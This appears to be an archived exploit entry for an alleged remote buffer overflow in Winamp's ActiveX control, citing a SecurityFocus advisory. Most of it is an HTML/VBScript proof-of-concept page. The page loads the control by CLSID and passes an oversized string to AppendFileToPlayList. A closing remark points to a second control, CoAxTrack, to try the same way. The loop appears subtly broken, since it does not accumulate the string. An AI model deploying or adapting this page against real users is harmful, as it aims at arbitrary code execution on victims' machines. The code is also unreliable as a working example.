28 lines
No EOL
926 B
HTML
28 lines
No EOL
926 B
HTML
source: https://www.securityfocus.com/bid/11107/info
|
|
|
|
Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.
|
|
|
|
<HTML>
|
|
<HEAD>
|
|
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
|
|
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
|
|
<BODY>
|
|
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
|
|
B8E8-11D6-A667-0010B556D978>
|
|
<PARAM NAME="Initialize" VALUE="">
|
|
</OBJECT>
|
|
<SCRIPT language=vbscript>
|
|
|
|
dim xint
|
|
dim haveIgotthebestbumorwhat
|
|
for xint = 1 to 5000
|
|
haveIgotthebestbumorwhat = foo & "K"
|
|
next
|
|
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat
|
|
|
|
</SCRIPT>
|
|
</BODY></HTML>
|
|
|
|
If you're bored could also try -
|
|
|
|
CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}. |